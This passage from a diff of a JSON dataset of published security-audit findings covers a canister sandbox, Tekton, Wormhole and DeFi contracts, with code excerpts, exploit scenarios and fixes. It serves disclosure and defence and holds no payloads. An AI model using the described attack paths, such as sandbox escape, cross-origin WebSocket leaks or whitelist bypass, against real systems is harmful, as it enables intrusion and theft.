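A sketch combining the checks recommended for finding 16 above (minThreshold is a hypothetical configuration value; the tuple layout matches Chainlink's latestRoundData):
( uint80 roundID, int256 price, , uint256 updatedAt, uint80 answeredInRound ) = _aggregator.latestRoundData();
require(price > 0, \"non-positive price\"); // guard the int256 -> uint256 coercion
require(updatedAt != 0 && answeredInRound == roundID, \"round not complete\");
require(block.timestamp - updatedAt <= minThreshold, \"stale price\");
return uint256(price);
- "title": "1. 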
The canister sandbox has vulnerable dependencies ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYCanisterSandbox.pdf", - "body": "The canister sandbox codebase uses the following vulnerable or unmaintained Rust dependencies. (All of the crates listed are indirect dependencies of the codebase.) Dependency Version ID", + "title": "16. Improper validation of Chainlink data ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The latestRoundData function returns a signed integer that is coerced to an unsigned integer without checking that the value is positive. An overflow (e.g., uint(-1) ) would result in drastic misrepresentation of the price and unexpected behavior. In addition, ChainlinkLib does not ensure the completeness or recency of round data, so pricing data may not reflect recent changes. It is best practice to define a window in which data is considered sufficiently recent (e.g., within a minute of the last update) by comparing the block timestamp to updatedAt . (, int256 price , , , ) = _aggregator.latestRoundData(); return uint256 (price); Figure 16.1: Part of the getCurrentTokenPrice function in ChainlinkLib.sol:113-114 Recommendations Short term, have latestRoundData and similar functions verify that values are non-negative before converting them to unsigned integers, and add an invariant require(updatedAt != 0 && answeredInRound == roundID) to ensure that the round has finished and that the pricing data is from the current round. Long term, define a minimum update threshold and add the following check: require((block.timestamp - updatedAt <= minThreshold) && (answeredInRound == roundID)) .", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Low" + "Severity: Low", + "Difficulty: Medium" ] }, { - "title": "2. Complete environment of the replica is passed to the sandboxed process ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYCanisterSandbox.pdf", - "body": "When the spawn_socketed_process function spawns a new sandboxed process, the call to the Command::spawn method passes the entire environment of the replica to the sandboxed process. pub fn spawn_socketed_process( exec_path: &str, argv: &[String], socket: RawFd, ) -> std::io::Result<Child> { let mut cmd = Command::new(exec_path); cmd.args(argv); // In case of Command we inherit the current process's environment. This should // particularly include things such as Rust backtrace flags. It might be // advisable to filter/configure that (in case there might be information in // env that the sandbox process should not be privy to). // The following block duplicates sock_sandbox fd under fd 3, errors are // handled. unsafe { cmd.pre_exec(move || { let fd = libc::dup2(socket, 3); if fd != 3 { return Err(std::io::Error::last_os_error()); } Ok(()) }) }; let child_handle = cmd.spawn()?; Ok(child_handle) } Figure 2.1: canister_sandbox/common/src/process.rs:17- The DFINITY team does not use environment variables for sensitive information. However, sharing the environment with the sandbox introduces a latent risk that system configuration data or other sensitive data could be leaked to the sandboxed process in the future. Exploit Scenario A malicious canister gains arbitrary code execution within a sandboxed process. 
Since the environment of the replica was leaked to the sandbox when the process was created, the canister gains information about the system that it is running on and learns sensitive information passed as environment variables to the replica, making further efforts to compromise the system easier. Recommendations Short term, add code that filters the environment passed to the sandboxed process (e.g., Command::env_clear or Command::env_remove) to ensure that no sensitive information is leaked if the sandbox is compromised.", + "title": "25. Incorrect safeIncreaseAllowance() amount can cause invest() calls to revert ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "Calls to make investments through Sushiswap can revert because the sushiSwapRouter may not have the token allowances needed to fulfill the requests. The owner of the MosaicHolding contract is responsible for investing user-deposited funds in investment strategies. The contract owner does this by calling the contract's invest() function, which then calls makeInvestment() on the investment strategy meant to receive the funds (figure 25.1). function invest ( IInvestmentStrategy.Investment[] calldata _investments, address _investmentStrategy , bytes calldata _data ) external override onlyAdmin validAddress(_investmentStrategy) { require (investmentStrategies[_investmentStrategy], \"ERR: STRATEGY NOT SET\" ); uint256 investmentsLength = _investments.length; address contractAddress = address ( this ); for ( uint256 i ; i < investmentsLength; i++) { IInvestmentStrategy.Investment memory investment = _investments[i]; require (investment.amount != 0 && investment.token != address ( 0 ), \"ERR: TOKEN AMOUNT\" ); IERC20Upgradeable token = IERC20Upgradeable(investment.token); require (token.balanceOf(contractAddress) >= investment.amount, \"ERR: BALANCE\" ); token.safeApprove(_investmentStrategy, investment.amount); } uint256 mintedTokens = IInvestmentStrategy(_investmentStrategy).makeInvestment( _investments, _data ); emit FoundsInvested(_investmentStrategy, msg.sender , mintedTokens); } Figure 25.1: The invest function in MosaicHolding:190- To deposit funds into the SushiswapLiquidityProvider investment strategy, the contract must increase the sushiSwapRouter's approval limits to account for the tokenA and tokenB amounts to be transferred. However, tokenB's approval limit is increased only to the amount of the tokenA investment (figure 25.2). 
function makeInvestment (Investment[] calldata _investments, bytes calldata _data) external override onlyInvestor nonReentrant returns ( uint256 ) { Investment memory investmentA = _investments[ 0 ]; Investment memory investmentB = _investments[ 1 ]; IERC20Upgradeable tokenA = IERC20Upgradeable(investmentA.token); IERC20Upgradeable tokenB = IERC20Upgradeable(investmentB.token); tokenA.safeTransferFrom( msg.sender , address ( this ), investmentA.amount); tokenB.safeTransferFrom( msg.sender , address ( this ), investmentB.amount); tokenA.safeIncreaseAllowance( address (sushiSwapRouter), investmentA.amount); tokenB.safeIncreaseAllowance( address (sushiSwapRouter), investmentA.amount); ( uint256 deadline , uint256 minA , uint256 minB ) = abi.decode( _data, ( uint256 , uint256 , uint256 ) ); (, , uint256 liquidity ) = sushiSwapRouter.addLiquidity( investmentA.token, investmentB.token, investmentA.amount, investmentB.amount, minA, minB, address ( this ), deadline ); return liquidity; } Figure 25.2: The makeInvestment function in SushiswapLiquidityProvider:52-85 If the amount of tokenB to be deposited is greater than that of tokenA, sushiSwapRouter will fail to transfer the tokens, and the transaction will revert. Exploit Scenario Alice, the owner of the MosaicHolding contract, wishes to invest liquidity in a Sushiswap liquidity pool. The amount of the tokenB investment is greater than that of tokenA. The sushiSwapRouter does not have the right token allowances for the transaction, and the investment request fails. Recommendations Short term, change the amount value used in the safeIncreaseAllowance() call from investmentA.amount to investmentB.amount . Long term, review the codebase to identify similar issues. Additionally, create a more extensive test suite capable of testing edge cases that may invalidate system assumptions.", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: High" + "Severity: Low", + "Difficulty: Medium" ] }, { - "title": "3. SELinux policy allows the sandbox process to write replica log messages ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYCanisterSandbox.pdf", - "body": "When a new sandboxed process is spawned using Command::spawn, the process's stdin, stdout, and stderr file descriptors are inherited from the parent process. The SELinux policy for the canister sandbox currently allows sandboxed processes to read from and write to all file descriptors inherited from the replica (the file descriptors created by init when the replica is started, as well as the file descriptor used for interprocess RPC). As a result, a compromised sandbox could spoof log messages to the replica's stdout or stderr. # Allow to use the logging file descriptor inherited from init. # This should actually not be allowed, logs should be routed through # replica. allow ic_canister_sandbox_t init_t : fd { use }; allow ic_canister_sandbox_t init_t : unix_stream_socket { read write }; Figure 3.1: guestos/rootfs/prep/ic-node/ic-node.te:312-316 Additionally, sandboxed processes' read and write access to files with the tmpfs_t context appears to be overly broad, but considering the fact that sandboxed processes are not allowed to open files, we did not see any way to exploit this. Exploit Scenario A malicious canister gains arbitrary code execution within a sandboxed process. 
By writing fake log messages to the replica's stderr file descriptor, the canister makes it look like the replica has other issues, masking the compromise and making incident response more difficult. Recommendations Short term, change the SELinux policy to disallow sandboxed processes from reading from and writing to the inherited file descriptors stdin, stdout, and stderr.", + "title": "17. Incorrect check of token status in the providePassiveLiquidity function ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "A passive LP can provide liquidity in the form of a token that is not whitelisted. The providePassiveLiquidity() function in MosaicVault is called by users who wish to participate in the Mosaic system as passive LPs. As part of the function's execution, it checks whether there is a ReceiptToken associated with the _tokenAddress input parameter (figure 17.1). This is equivalent to checking whether the token is whitelisted by the system. function providePassiveLiquidity( uint256 _amount, address _tokenAddress) external payable override nonReentrant whenNotPaused { require (_amount > 0 || msg.value > 0 , \"ERR: AMOUNT\" ); if ( msg.value > 0 ) { require ( vaultConfig.getUnderlyingIOUAddress(vaultConfig.wethAddress()) != address ( 0 ), \"ERR: WETH NOT WHITELISTED\" ); _provideLiquidity( msg.value , vaultConfig.wethAddress(), 0 ); } else { require (_tokenAddress != address ( 0 ), \"ERR: INVALID TOKEN\" ); require ( vaultConfig.getUnderlyingIOUAddress(_tokenAddress) != address ( 0 ), \"ERR: TOKEN NOT WHITELISTED\" ); _provideLiquidity(_amount, _tokenAddress, 0 ); } } Figure 17.1: The providePassiveLiquidity function in MosaicVault:127-149 However, providePassiveLiquidity() uses an incorrect function call to check the whitelist status. Instead of calling getUnderlyingReceiptAddress() , it calls getUnderlyingIOUAddress() . The same issue occurs in checks of WETH deposits. Exploit Scenario Eve decides to deposit liquidity in the form of a token that is whitelisted only for active LPs. The token provides a higher yield than the tokens whitelisted for passive LPs. This may enable Eve to receive a higher annual percentage yield on her deposit than other passive LPs in the system receive on theirs. Recommendations Short term, change the function called to validate tokenAddress and wethAddress from getUnderlyingIOUAddress() to getUnderlyingReceiptAddress() . Long term, take the following steps: Review the codebase to identify similar errors. Consider whether the assumption that the same tokens will be whitelisted for both passive and active LPs will hold in the future. Create a more extensive test suite capable of testing edge cases that may invalidate system assumptions.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2030,29 +4800,29 @@ ] }, { - "title": "4. Canister sandbox system calls are not filtered using Seccomp ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYCanisterSandbox.pdf", - "body": "Seccomp provides a framework to filter outgoing system calls. Using Seccomp, a process can limit the type of system calls available to it, thereby limiting the available attack surface of the kernel. The current implementation of the canister sandbox does not use Seccomp; instead, it relies on mandatory access controls (via SELinux) to restrict the system calls available to a sandboxed process. 
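As an illustration of the mechanism (not code from the audited Rust codebase), a syscall allowlist along these lines could be built with the libseccomp-golang bindings; the allowed syscall set below is hypothetical, not the set a real sandbox would need.

package main

import (
	seccomp "github.com/seccomp/libseccomp-golang"
)

// applyAllowlist installs a filter that returns EPERM for every syscall
// not explicitly allowed. Sketch only; the allowlist is illustrative.
func applyAllowlist() error {
	filter, err := seccomp.NewFilter(seccomp.ActErrno.SetReturnCode(1)) // 1 == EPERM
	if err != nil {
		return err
	}
	for _, name := range []string{"read", "write", "futex", "exit_group"} {
		sc, err := seccomp.GetSyscallFromName(name)
		if err != nil {
			return err
		}
		if err := filter.AddRule(sc, seccomp.ActAllow); err != nil {
			return err
		}
	}
	return filter.Load() // applies the filter to the calling process
}

func main() { _ = applyAllowlist() }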
While SELinux is useful for restricting access to files, directories, and other processes, Seccomp provides more fine-grained control over kernel system calls and their arguments. For this reason, Seccomp (in particular, Seccomp-BPF) is a useful complement to SELinux in restricting a sandboxed process's access to the system. Exploit Scenario A malicious canister gains arbitrary code execution within a sandboxed process. By exploiting a vulnerability in the kernel, it is able to break out of the sandbox and execute arbitrary code on the node. Recommendations Long term, consider using Seccomp-BPF to restrict the system calls available to a sandboxed process. Extra care must be taken when the canister sandbox (or any of its dependencies) is updated to ensure that the set of system calls invoked during normal execution has not changed.", + "title": "18. Solidity compiler optimizations can be problematic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The Composable Finance contracts have enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed . Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past . A high-severity bug in the emscripten-generated solc-js compiler used by Truffle and Remix persisted until late 2018. The fix for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6 . More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe . It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizationsor in the Emscripten transpilation to solc-js causes a security vulnerability in the Composable Finance contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Informational", "Difficulty: Low" ] }, { - "title": "5. Invalid system state changes cause the replica to panic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYCanisterSandbox.pdf", - "body": "When a sandboxed process has completed an execution request, the hypervisor calls SystemStateChanges::apply_changes (in Hypervisor::execute) to apply the system state changes to the global canister system state. pub fn apply_changes(self, system_state: &mut SystemState) { // Verify total cycle change is not positive and update cycles balance. assert!(self.cycle_change_is_valid( system_state.canister_id == CYCLES_MINTING_CANISTER_ID )); self.cycles_balance_change .apply_ref(system_state.balance_mut()); // Observe consumed cycles. 
system_state .canister_metrics .consumed_cycles_since_replica_started += NominalCycles::from_cycles(self.cycles_consumed); // Verify we don't accept more cycles than are available from each call // context and update each call context balance if !self.call_context_balance_taken.is_empty() { let call_context_manager = system_state.call_context_manager_mut().unwrap(); for (context_id, amount_taken) in &self.call_context_balance_taken { let call_context = call_context_manager .call_context_mut(*context_id) .expect(\"Canister accepted cycles from invalid call context\"); call_context .withdraw_cycles(*amount_taken) .expect(\"Canister accepted more cycles than available ...\"); } } // Push outgoing messages. for msg in self.requests { system_state .push_output_request(msg) .expect(\"Unable to send new request\"); } // Verify new certified data isn't too long and set it. if let Some(certified_data) = self.new_certified_data.as_ref() { assert!(certified_data.len() <= CERTIFIED_DATA_MAX_LENGTH as usize); system_state.certified_data = certified_data.clone(); } // Verify callback ids and register new callbacks. for update in self.callback_updates { match update { CallbackUpdate::Register(expected_id, callback) => { let id = system_state .call_context_manager_mut() .unwrap() .register_callback(callback); assert_eq!(id, expected_id); } CallbackUpdate::Unregister(callback_id) => { let _callback = system_state .call_context_manager_mut() .unwrap() .unregister_callback(callback_id) .expect(\"Tried to unregister callback with an id ...\"); } } } } Figure 5.1: system_api/src/sandbox_safe_system_state.rs:99-157 The apply_changes method uses assert and expect to ensure that system state invariants involving cycle balances, call contexts, and callback updates are upheld. By sending a WebAssembly (Wasm) execution output with invalid system state changes, a compromised sandboxed process could use this to cause the replica to panic. Exploit Scenario A malicious canister gains arbitrary code execution within a sandboxed process. The canister sends a Wasm execution output message containing invalid state changes to the replica, which causes the replica process to panic, crashing the entire subnet. Recommendations Short term, revise SystemStateChanges::apply_changes so that it returns an error if the system state changes from a sandboxed process are found to be invalid. Long term, audit the codebase for the use of panicking functions and macros like assert, unreachable, unwrap, or expect in code that validates data from untrusted sources.", + "title": "19. Lack of contract documentation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The codebases lack code documentation, high-level descriptions, and examples, making the contracts dicult to review and increasing the likelihood of user mistakes. 
The CrosslayerPortal codebase would benefit from additional documentation, including on the following: The logic responsible for setting the roles in the core and the reason for the manipulation of indexes The incoming function arguments and the values used on source chains and destination chains The arithmetic involved in reward calculations and the relayer's distribution of tokens The checks performed by the off-chain components, such as the relayer and the rebalancing bot The third-party integrations The rebalancing arithmetic and calculations There should also be clear NatSpec documentation on every function, identifying the unit of each variable, the function's intended use, and the function's safe values. The documentation should include all expected properties and assumptions relevant to the aforementioned aspects of the codebase. Recommendations Short term, review and properly document the aforementioned aspects of the codebase. Long term, consider writing a formal specification of the protocol.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: Low" ] }, { - "title": "6. SandboxedExecutionController does not enforce memory size invariants ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYCanisterSandbox.pdf", - "body": "When a sandboxed process has completed an execution request, the execution state is updated by the SandboxedExecutionController::process method with the data from the execution output. // Unless execution trapped, commit state (applying execution state // changes, returning system state changes to caller). let system_state_changes = if exec_output.wasm.wasm_result.is_ok() { if let Some(state_modifications) = exec_output.state { // TODO: If a canister has broken out of wasm then it might have allocated // more wasm or stable memory than allowed. We should add an additional // check here that the canister is still within its allowed memory usage. execution_state .wasm_memory .page_map .deserialize_delta(state_modifications.wasm_memory.page_delta); execution_state.wasm_memory.size = state_modifications.wasm_memory.size; execution_state.wasm_memory.sandbox_memory = SandboxMemory::synced( wrap_remote_memory(&sandbox_process, next_wasm_memory_id), ); execution_state .stable_memory .page_map .deserialize_delta(state_modifications.stable_memory.page_delta); execution_state.stable_memory.size = state_modifications.stable_memory.size; execution_state.stable_memory.sandbox_memory = SandboxMemory::synced( wrap_remote_memory(&sandbox_process, next_stable_memory_id), ); // ... state_modifications.system_state_changes } else { SystemStateChanges::default() } } else { SystemStateChanges::default() }; Figure 6.1: replica_controller/src/sandboxed_execution_controller.rs:663 However, the code does not validate the Wasm and stable memory sizes against the corresponding page maps. This means that a compromised sandbox could report a Wasm or stable memory size of 0 along with a non-empty page map. Since these memory sizes are used to calculate the total memory used by the canister in ExecutionState::memory_usage, this lack of validation could allow the canister to use up cycles normally reserved for memory use. pub fn memory_usage(&self) -> NumBytes { // We use 8 bytes per global. 
let globals_size_bytes = 8 * self.exported_globals.len() as u64; let wasm_binary_size_bytes = self.wasm_binary.binary.len() as u64; num_bytes_try_from(self.wasm_memory.size) .expect(\"could not convert from wasm memory number of pages to bytes\") + num_bytes_try_from(self.stable_memory.size) .expect(\"could not convert from stable memory number of pages to bytes\") + NumBytes::from(globals_size_bytes) + NumBytes::from(wasm_binary_size_bytes) } Figure 6.2: replicated_state/src/canister_state/execution_state.rs:411421 Canister memory usage aects how much the cycles account manager charges the canister for resource allocation. If the canister uses best-eort memory allocation, the implementation calls through to ExecutionState::memory_usage to compute how much memory the canister is using. pub fn charge_canister_for_resource_allocation_and_usage( &self, log: &ReplicaLogger, canister: &mut CanisterState, duration_between_blocks: Duration, ) -> Result<(), CanisterOutOfCyclesError> { let bytes_to_charge = match canister.memory_allocation() { // The canister has explicitly asked for a memory allocation. MemoryAllocation::Reserved(bytes) => bytes, // The canister uses best-effort memory allocation. MemoryAllocation::BestEffort => canister.memory_usage(self.own_subnet_type), }; if let Err(err) = self.charge_for_memory( &mut canister.system_state, bytes_to_charge, duration_between_blocks, ) { } // ... // ... } Figure 6.3: cycles_account_manager/src/lib.rs:671 Thus, if a sandboxed process reports a lower memory usage, the cycles account manager will charge the canister less than it should. It is unclear whether this represents expected behavior when a canister breaks out of the Wasm execution environment. Clearly, if the canister is able to execute arbitrary code in the context of a sandboxed process, then the replica has lost all ability to meter and restrict canister execution, which means that accounting for canister cycle and memory use is largely meaningless. Exploit Scenario A malicious canister gains arbitrary code execution within a sandboxed process. The canister reports the wrong memory sizes back to the replica with the execution output. This causes the cycles account manager to miscalculate the remaining available cycles for the canister in the charge_canister_for_resource_allocation_and_usage method. Recommendations Short term, document this behavior and ensure that implicitly trusting the canister output could not adversely aect the replica or other canisters running on the system. Consider enforcing the correct invariants for memory allocations reported by a sandboxed process. The following invariant should always hold for Wasm and stable memory: page_map_size <= memory.size <= MAX_SIZE page_map_size could be computed as memory.page_map.num_host_pages() * PAGE_SIZE.", + "title": "21. Unnecessary complexity due to interactions with native and smart contract tokens ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The Composable Finance code is needlessly complex and has excessive branching. Its complexity largely results from the integration of both ERC20s and native tokens (i.e., ether). Creating separate functions that convert native tokens to ERC20s and then interact with functions that must receive ERC20 tokens (i.e., implementing separation of concerns) would drastically simplify and optimize the code. 
This complexity is the source of many bugs and increases the gas costs for all users whether or not they need to distinguish between ERC20s and ether. It is best practice to make components as small as possible and to separate helpful but noncritical components into periphery contracts. This reduces the attack surface and improves readability. Figure 21.1 shows an example of complex code. if (tempData.isSlp) { IERC20(sushiConfig.slpToken()).safeTransfer( msg.sender , tempData.slpAmount ); [...] } else { //unwrap and send the right asset [...] if (tempData.isEth) { [...] } else { IERC20(sushiConfig.wethToken()).safeTransfer( Figure 21.1: Part of the withdraw function in SushiSlpStrategy.sol:L180-L216 Recommendations Short term, remove the native ether interactions and use WETH instead. Long term, minimize the function complexity by breaking functions into smaller units. Additionally, refactor the code with minimalism in mind and extend the core functionality into periphery contracts.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2060,71 +4830,69 @@ ] }, { - "title": "1. The use of time.After() in select statements can lead to memory leaks ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", - "body": "Calls to time.After in for/select statements can lead to memory leaks because the garbage collector does not clean up the underlying Timer object until the timer res. A new timer, which requires resources, is initialized at each iteration of the for loop (and, hence, the select statement). As a result, many routines originating from the time.After call could lead to overconsumption of the memory. for { select { case <-ctx.Done(): // When the context is cancelled, stop reporting. return case <-time.After(r.ReportingPeriod): // Every 30s surface a metric for the number of running pipelines. if err := r.RunningPipelineRuns(lister); err != nil { logger.Warnf(\"Failed to log the metrics : %v\", err) } Figure 1.1: tektoncd/pipeline/pkg/pipelinerunmetrics/metrics.go#L290-L300 for { select { case <-ctx.Done(): // When the context is cancelled, stop reporting. return case <-time.After(r.ReportingPeriod): // Every 30s surface a metric for the number of running tasks. if err := r.RunningTaskRuns(lister); err != nil { logger.Warnf(\"Failed to log the metrics : %v\", err) } } Figure 1.2: pipeline/pkg/taskrunmetrics/metrics.go#L380-L391 Exploit Scenario An attacker nds a way to overuse a function, which leads to overconsumption of the memory and causes Tekton Pipelines to crash. Recommendations Short term, consider refactoring the code that uses the time.After function in for/select loops using tickers. This will prevent memory leaks and crashes caused by memory exhaustion. Long term, ensure that the time.After method is not used in for/select routines. Periodically use the Semgrep query to check for and detect similar patterns. References Use with caution time.After Can cause memory leak (golang) Golang <-time.After() is not garbage collected before expiry", + "title": "29. Use of legacy openssl version in CrosslayerPortal tests ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The CrosslayerPortal project uses a legacy version of openssl to run tests. While this version is not exposed in production, the use of outdated security protocols may be risky (gure 29.1). 
An unexpected error occurred: Error: error:0308010C:digital envelope routines::unsupported at new Hash (node:internal/crypto/hash:67:19) at Object.createHash (node:crypto:130:10) at hash160 (~/CrosslayerPortal/node_modules/ethereum-cryptography/vendor/hdkey-without-crypto.js:249:21) at HDKey.set (~/CrosslayerPortal/node_modules/ethereum-cryptography/vendor/hdkey-without-crypto.js:50:24) at Function.HDKey.fromMasterSeed (~/CrosslayerPortal/node_modules/ethereum-cryptography/vendor/hdkey-without-crypto.js:194:20) at deriveKeyFromMnemonicAndPath (~/CrosslayerPortal/node_modules/hardhat/src/internal/util/keys-derivation.ts:21:27) at derivePrivateKeys (~/CrosslayerPortal/node_modules/hardhat/src/internal/core/providers/util.ts:29:52) at normalizeHardhatNetworkAccountsConfig (~/CrosslayerPortal/node_modules/hardhat/src/internal/core/providers/util.ts:56:10) at createProvider (~/CrosslayerPortal/node_modules/hardhat/src/internal/core/providers/construction.ts:78:59) at ~/CrosslayerPortal/node_modules/hardhat/src/internal/core/runtime-environment.ts:80:28 { opensslErrorStack: [ 'error:03000086:digital envelope routines::initialization error' ], library: 'digital envelope routines', reason: 'unsupported', code: 'ERR_OSSL_EVP_UNSUPPORTED' } Figure 29.1: Errors flagged in npx hardhat testing Recommendations Short term, refactor the code to use a new version of openssl to prevent the exploitation of openssl vulnerabilities. Long term, avoid using outdated or legacy versions of dependencies. 22. Commented-out and unimplemented conditional statements Severity: Undetermined Difficulty: Low Type: Undefined Behavior Finding ID: TOB-CMP-22 Target: apyhunter-tricrypto/contracts/sushiswap/SushiSlpStrategy.sol", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: High", - "Severity: Low", - "Difficulty: High" + "Severity: Informational", + "Difficulty: N/A" ] }, { - "title": "2. Risk of resource exhaustion due to the use of defer inside a loop ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", - "body": "The ExecuteInterceptors function runs all interceptors configured for a given trigger inside a loop. The res.Body.Close() function is deferred at the end of the loop. Calling defer inside of a loop could cause resource exhaustion conditions because the deferred function is called when the function exits, not at the end of each loop. As a result, resources from each interceptor object are accumulated until the end of the for statement. While this may not cause noticeable issues in the current state of the application, it is best to call res.Body.Close() at the end of each loop to prevent unforeseen issues. func (r Sink) ExecuteInterceptors(trInt []*triggersv1.TriggerInterceptor, in *http.Request, event []byte, log *zap.SugaredLogger, eventID string, triggerID string, namespace string, extensions map[string]interface{}) ([]byte, http.Header, *triggersv1.InterceptorResponse, error) { if len(trInt) == 0 { return event, in.Header, nil, nil } // (...) for _, i := range trInt { if i.Webhook != nil { // Old style interceptor // (...) defer res.Body.Close() Figure 2.1: triggers/pkg/sink/sink.go#L428-L469 Recommendations Short term, rather than deferring the call to res.Body.Close(), add a call to res.Body.Close() at the end of the loop.", + "title": "23. 
Error-prone NFT management in the Summoner contract ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The Summoner contract's ability to hold NFTs in a number of states may create confusion regarding the contract's states and the differences between the contracts. For instance, the Summoner contract can hold the following kinds of NFTs: NFTs that have been pre-minted by Composable Finance and do not have metadata attached to them Original NFTs that have been locked by the Summoner for minting on the destination chain MosaicNFT wrapper tokens, which are copies of NFTs that have been locked and are intended to be minted on the destination chain As the system is scaled, the number of NFTs held by the Summoner, especially the number of pre-minted NFTs, will increase significantly. Recommendations Simplify the NFT architecture; see the related recommendations in Appendix E.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Undetermined", + "Difficulty: Low" ] }, { - "title": "1. Lack of doc comments ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf", - "body": "Publicly accessible functions within the governor and watcher code generally lack doc comments. Inadequately documented code can be misunderstood, which increases the likelihood of an improper bug fix or a mis-implemented feature. There are ten publicly accessible functions within governor.go. However, only one such function has a comment preceding it (see figure 1.1). // Returns true if the message can be published, false if it has been added to the pending list. func (gov *ChainGovernor) ProcessMsg(msg *common.MessagePublication) bool { Figure 1.1: node/pkg/governor/governor.go#L281-L282 Similarly, there are at least 28 publicly accessible functions among the non-EVM watchers. However, only seven of them are preceded by doc comments, and only one of the seven is not in the Near watcher code (see figure 1.2). 
// GetLatestFinalizedBlockNumber() returns the latest published block. func (s *SolanaWatcher) GetLatestFinalizedBlockNumber() uint64 { Figure 1.2: node/pkg/watchers/solana/client.go#L846-L847 Go's official documentation on doc comments states the following: A func's doc comment should explain what the function returns or, for functions called for side effects, what it does. Exploit Scenario Alice, a Wormhole developer, implements a new node feature involving the governor. Alice misunderstands how the functions called by her new feature work. Alice introduces a vulnerability into the node as a result. Recommendations Short term, add doc comments to each function that is accessible from outside of the package in which the function is defined. This will facilitate code review and reduce the likelihood that a developer introduces a bug into the code because of a misunderstanding. Long term, regularly review code comments to ensure they are accurate. Documentation must be kept up to date to be beneficial. References Go Doc Comments", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: High" ] }, { - "title": "5. Missing validation of Origin header in WebSocket upgrade requests ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", - "body": "Tekton Dashboard uses the WebSocket protocol to provide real-time updates for TaskRuns, PipelineRuns, and other Tekton data. The endpoints responsible for upgrading the incoming HTTP request to a WebSocket request do not validate the Origin header to ensure that the request is coming from a trusted origin (i.e., the dashboard itself). As a result, arbitrary malicious web pages can connect to Tekton Dashboard and receive these real-time updates, which may include sensitive information, such as the log output of TaskRuns and PipelineRuns. Exploit Scenario A user hosts Tekton Dashboard on a private address, such as one in a local area network or a virtual private network (VPN), without enabling application-layer authentication. An attacker identifies the URL of the dashboard instance (e.g., http://192.168.3.130:9097) and hosts a web page with the following content: Figure 5.1: A malicious web page that extracts Tekton Dashboard WebSocket updates The attacker convinces the user to visit the web page. Upon loading it, the user's browser successfully connects to the Tekton Dashboard WebSocket endpoint for monitoring PipelineRuns and logs received messages to the JavaScript console. As a result, the attacker's untrusted web origin now has access to real-time updates from a dashboard instance on a private network that would otherwise be inaccessible outside of that network. Figure 5.2: The untrusted origin http://localhost:8080 has access to Tekton Dashboard WebSocket messages. Recommendations Short term, modify the code so that it verifies that the Origin header of WebSocket upgrade requests corresponds to the trusted origin on which Tekton Dashboard is served. For example, if the origin is not http://192.168.3.130:9097, Tekton Dashboard should reject the incoming request. 6. Import resources feature does not validate repository URL scheme Severity: Informational Difficulty: Low Type: Data Validation Finding ID: TOB-TKN-6 Target: Dashboard", + "title": "2. Fields protected by mutex are not documented ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-wormhole-securityreview.pdf", + "body": "The fields protected by the governor's mutex are not documented. 
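As a sketch of the kind of documentation this finding asks for (with simplified placeholder types rather than the real ChainGovernor layout), the guarded fields can be grouped under a comment that names the mutex protecting them:

package governor

import "sync"

// Sketch only: placeholder types stand in for the real tokenEntry,
// chainEntry, and MessagePublication types.
type ChainGovernor struct {
	// Set at construction time and read-only afterward; no locking needed.
	dayLengthInMinutes int
	coinGeckoQuery     string

	// mutex guards every field below it, through msgsToPublish.
	mutex         sync.Mutex
	tokens        map[string]int
	msgsSeen      map[string]bool
	msgsToPublish []string
}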
